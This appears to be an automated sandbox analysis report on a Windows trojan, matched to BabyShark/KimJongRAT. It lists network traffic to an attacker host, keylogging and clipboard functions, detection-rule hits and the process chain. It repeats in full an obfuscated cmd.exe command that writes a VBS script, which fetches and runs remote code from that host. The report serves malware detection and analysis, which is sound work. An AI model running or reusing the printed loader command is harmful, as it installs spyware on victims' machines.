                  Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1a.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1am1.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /v/lp1382.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1aa3.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: unknownHTTPS traffic detected: 206.71.149.162:443 -> 192.168.2.4:49737 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00D8F6C7
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_00D7A54A
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00D8F45C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00D8F45C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00DA9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00DA9ED5

                  System Summary

                  barindex
                  Source: 13.2.attrib.exe.81bcfc.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 12.2.ef2dsio342ai.exe.40c211c.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 13.2.attrib.exe.7b9efc.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 12.2.ef2dsio342ai.exe.406031c.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 13.2.attrib.exe.81bcfc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 12.2.ef2dsio342ai.exe.406031c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 12.2.ef2dsio342ai.exe.40c211c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 13.2.attrib.exe.7b9efc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FEE9A10_2_00FEE9A1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D2E0BE12_2_00D2E0BE
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D3200712_2_00D32007
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D3803712_2_00D38037
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D1E1A012_2_00D1E1A0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D322C212_2_00D322C2
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D4A28E12_2_00D4A28E
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D1225D12_2_00D1225D
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D2C59E12_2_00D2C59E
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D9C7A312_2_00D9C7A3
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D4E89F12_2_00D4E89F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8291A12_2_00D8291A
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D46AFB12_2_00D46AFB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D78B2712_2_00D78B27
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D3CE3012_2_00D3CE30
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00DA51D212_2_00DA51D2
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D4716912_2_00D47169
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D1924012_2_00D19240
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D1949912_2_00D19499
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D3172412_2_00D31724
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D31A9612_2_00D31A96
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D37BAB12_2_00D37BAB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D19B6012_2_00D19B60
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D37DDA12_2_00D37DDA
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D31D4012_2_00D31D40
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100091AC12_2_100091AC
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100095C412_2_100095C4
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100177FB12_2_100177FB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100099F912_2_100099F9
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10019AB512_2_10019AB5
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10011D6512_2_10011D65
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10017D6B12_2_10017D6B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10009E2E12_2_10009E2E
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000C07B12_2_1000C07B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100182DB12_2_100182DB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10018A5712_2_10018A57
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10008B6012_2_10008B60
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10008CB812_2_10008CB8
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D71A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00D71A91
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: security.dllJump to behavior
                  Source: Joe Sandbox ViewDropped File: C:\wql455oi0\lp1a3 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                  Source: dGuYmJNS1K.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 13.2.attrib.exe.81bcfc.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 12.2.ef2dsio342ai.exe.40c211c.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 13.2.attrib.exe.7b9efc.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 12.2.ef2dsio342ai.exe.406031c.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 13.2.attrib.exe.81bcfc.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 12.2.ef2dsio342ai.exe.406031c.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 12.2.ef2dsio342ai.exe.40c211c.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 13.2.attrib.exe.7b9efc.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00D7F122
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: String function: 00FE1CF0 appears 35 times
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: String function: 00D30DC0 appears 46 times
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: String function: 00D2FD60 appears 31 times
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: String function: 1000ADA0 appears 48 times
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D84678: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_00D84678
                  Source: dGuYmJNS1K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\bjk6l9.vbsJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/19@1/1
                  Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8410F GetLastError,FormatMessageW,12_2_00D8410F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D83923 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00D83923
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
                  Source: dGuYmJNS1K.exeReversingLabs: Detection: 21%
                  Source: dGuYmJNS1K.exeVirustotal: Detection: 30%
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\dGuYmJNS1K.exe C:\Users\user\Desktop\dGuYmJNS1K.exe
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start C:\Users\Public\bjk6l9.vbs
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\wql455oi0\ef2dsio342ai.exe "C:\wql455oi0\ef2dsio342ai.exe" ef2dsio342
                  Source: C:\wql455oi0\ef2dsio342ai.exeProcess created: C:\Windows\SysWOW64\attrib.exe c:/windows/SysWOW64/attrib.exe
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start C:\Users\Public\bjk6l9.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\wql455oi0\ef2dsio342ai.exe "C:\wql455oi0\ef2dsio342ai.exe" ef2dsio342Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeProcess created: C:\Windows\SysWOW64\attrib.exe c:/windows/SysWOW64/attrib.exeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7194F AdjustTokenPrivileges,CloseHandle,12_2_00D7194F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D71F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00D71F53
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D94089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,12_2_00D94089
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D85B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,12_2_00D85B27
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D9AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00D9AFDB
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCommand line argument: GtYD20_2_00FE1000
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCommand line argument: GTYD20_2_00FE1000
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCommand line argument: GTYD20_2_00FE1000
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCommand line argument: GtYD20_2_00FE1000
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCommand line argument: GTYD20_2_00FE1000
                  Source: attrib.exeString found in binary or memory: NATS-SEFI-ADD
                  Source: attrib.exeString found in binary or memory: NATS-DANO-ADD
                  Source: attrib.exeString found in binary or memory: JIS_C6229-1984-b-add
                  Source: attrib.exeString found in binary or memory: jp-ocr-b-add
                  Source: attrib.exeString found in binary or memory: JIS_C6229-1984-hand-add
                  Source: attrib.exeString found in binary or memory: jp-ocr-hand-add
                  Source: attrib.exeString found in binary or memory: ISO_6937-2-add
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: dGuYmJNS1K.exeStatic file information: File size 1049600 > 1048576
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: dGuYmJNS1K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: dGuYmJNS1K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: c:\U\Release\s6i226.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877832158.0000000001F51000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001F84000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001FB5000.00000004.00000020.00020000.00000000.sdmp
